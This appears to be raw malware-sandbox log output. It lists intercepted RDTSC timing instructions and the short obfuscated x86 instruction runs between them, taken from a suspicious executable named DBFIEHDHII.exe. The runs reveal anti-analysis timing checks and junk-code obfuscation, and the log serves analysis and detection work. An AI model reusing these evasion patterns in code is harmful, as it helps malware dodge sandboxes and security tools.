Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F28600 second address: F28606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C26F second address: DAEAE2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C7D0F0874h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 518912E2h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F8C7D0F0868h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push ebx 0x0000002c mov edx, dword ptr [ebp+122D2B6Fh] 0x00000032 pop edx 0x00000033 push dword ptr [ebp+122D122Dh] 0x00000039 mov dword ptr [ebp+122D296Dh], esi 0x0000003f call dword ptr [ebp+122D372Bh] 0x00000045 pushad 0x00000046 sub dword ptr [ebp+122D1D3Ch], edi 0x0000004c xor eax, eax 0x0000004e jmp 00007F8C7D0F086Ah 0x00000053 mov edx, dword ptr [esp+28h] 0x00000057 clc 0x00000058 mov dword ptr [ebp+122D2BD3h], eax 0x0000005e jc 00007F8C7D0F0871h 0x00000064 pushad 0x00000065 movsx ebx, bx 0x00000068 mov esi, dword ptr [ebp+122D29BBh] 0x0000006e popad 0x0000006f mov esi, 0000003Ch 0x00000074 mov dword ptr [ebp+122D1D3Ch], eax 0x0000007a jmp 00007F8C7D0F086Bh 0x0000007f add esi, dword ptr [esp+24h] 0x00000083 sub dword ptr [ebp+122D1D3Ch], ebx 0x00000089 lodsw 0x0000008b sub dword ptr [ebp+122D1D3Ch], edi 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 mov dword ptr [ebp+122D1D3Ch], ecx 0x0000009b mov ebx, dword ptr [esp+24h] 0x0000009f sub dword ptr [ebp+122D1E0Ah], ebx 0x000000a5 push eax 0x000000a6 push eax 0x000000a7 push edx 0x000000a8 jmp 00007F8C7D0F0872h 0x000000ad rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C2D2 second address: F2C2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8C7D0F21C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C2DD second address: F2C2E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C2E3 second address: F2C2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C2E7 second address: F2C2EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C580 second address: F2C584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C584 second address: F2C5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dword ptr [ebp+122D1D26h], ecx 0x00000010 push 00000000h 0x00000012 sbb esi, 28354E75h 0x00000018 push 290A3704h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C5A9 second address: F2C5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C5B3 second address: F2C5B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2C5B7 second address: F2C66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 290A3784h 0x0000000f push 00000003h 0x00000011 jns 00007F8C7D0F21D2h 0x00000017 push 00000000h 0x00000019 jmp 00007F8C7D0F21CBh 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F8C7D0F21C8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a call 00007F8C7D0F21C9h 0x0000003f push edx 0x00000040 jbe 00007F8C7D0F21C8h 0x00000046 push edi 0x00000047 pop edi 0x00000048 pop edx 0x00000049 push eax 0x0000004a pushad 0x0000004b push edi 0x0000004c jmp 00007F8C7D0F21CFh 0x00000051 pop edi 0x00000052 jmp 00007F8C7D0F21CEh 0x00000057 popad 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c jnl 00007F8C7D0F21D7h 0x00000062 mov eax, dword ptr [eax] 0x00000064 jmp 00007F8C7D0F21CBh 0x00000069 mov dword ptr [esp+04h], eax 0x0000006d push ebx 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4AB54 second address: F4AB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4AE38 second address: F4AE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4AE3E second address: F4AE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jc 00007F8C7D0F0866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4AE4E second address: F4AE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4AFE4 second address: F4AFEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4AFEA second address: F4B013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8C7D0F21C8h 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 jbe 00007F8C7D0F21C6h 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8C7D0F21CDh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B013 second address: F4B017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B14F second address: F4B172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jnl 00007F8C7D0F21D4h 0x0000000d jp 00007F8C7D0F21CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B172 second address: F4B189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jnc 00007F8C7D0F0866h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnc 00007F8C7D0F0866h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B580 second address: F4B5A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F8C7D0F21C8h 0x00000011 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B5A4 second address: F4B5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B5AA second address: F4B5AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4B717 second address: F4B721 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C7D0F0866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4BCEE second address: F4BD18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F8C7D0F21D9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F1830C second address: F18310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4C4E8 second address: F4C4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4C4EC second address: F4C4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4C646 second address: F4C64E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4C64E second address: F4C668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F0874h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4C668 second address: F4C66C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4CC1A second address: F4CC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4CC1E second address: F4CC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C7D0F21D3h 0x00000012 jmp 00007F8C7D0F21D2h 0x00000017 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4CC50 second address: F4CC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F4CC54 second address: F4CC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F525C4 second address: F525C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F525C8 second address: F525DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F8C7D0F21C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F525DF second address: F525E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F525E3 second address: F525EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C7D0F21C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F525EF second address: F52618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C7D0F0873h 0x00000008 jno 00007F8C7D0F0866h 0x0000000e jbe 00007F8C7D0F0866h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F52618 second address: F5261C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F54B56 second address: F54B5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F54B5B second address: F54B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5827F second address: F58285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F58285 second address: F58292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F58292 second address: F58296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F58296 second address: F582C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 jc 00007F8C7D0F21EBh 0x0000000f pushad 0x00000010 jmp 00007F8C7D0F21CDh 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F8C7D0F21C6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E2A8 second address: F0E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C7D0F0866h 0x0000000a jp 00007F8C7D0F0866h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C7D0F0872h 0x00000018 jbe 00007F8C7D0F0866h 0x0000001e rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E2D3 second address: F0E2E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E2E2 second address: F0E2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0873h 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E2FD second address: F0E303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E303 second address: F0E308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E308 second address: F0E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C7D0F21D7h 0x00000008 jnl 00007F8C7D0F21C6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E32D second address: F0E347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0876h 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F0E347 second address: F0E362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F577C2 second address: F577C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F577C8 second address: F577CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5792D second address: F57954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnp 00007F8C7D0F089Ch 0x0000000c jmp 00007F8C7D0F0877h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F57954 second address: F5795A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5795A second address: F5795E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F57BF0 second address: F57BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F57F5C second address: F57F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C7D0F086Eh 0x0000000b popad 0x0000000c jbe 00007F8C7D0F0886h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5810F second address: F58113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F58113 second address: F5812F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0876h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5B639 second address: F5B651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5B651 second address: F5B66E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8C7D0F086Fh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5B66E second address: F5B672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5B672 second address: F5B678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5B678 second address: F5B694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jbe 00007F8C7D0F21D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5B694 second address: F5B6B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push F0F283AAh 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F8C7D0F0870h 0x00000018 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5C2D2 second address: F5C2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5C74D second address: F5C751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5C867 second address: F5C86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F5FCAE second address: F5FD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F8C7D0F0878h 0x0000000e pop edi 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F8C7D0F0868h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a jo 00007F8C7D0F0871h 0x00000030 pushad 0x00000031 jc 00007F8C7D0F0866h 0x00000037 sbb al, FFFFFFF2h 0x0000003a popad 0x0000003b push 00000000h 0x0000003d add dword ptr [ebp+122D33F2h], edx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007F8C7D0F0868h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D39CCh], edi 0x00000065 call 00007F8C7D0F0874h 0x0000006a pop esi 0x0000006b xchg eax, ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F8C7D0F0877h 0x00000073 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6076B second address: F6077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F61D02 second address: F61D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F67469 second address: F6746D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6A977 second address: F6A97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6A97D second address: F6A981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6A981 second address: F6A985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6B979 second address: F6B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6B97F second address: F6B984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6AADA second address: F6AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F8C7D0F21C6h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6AAF0 second address: F6AAF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
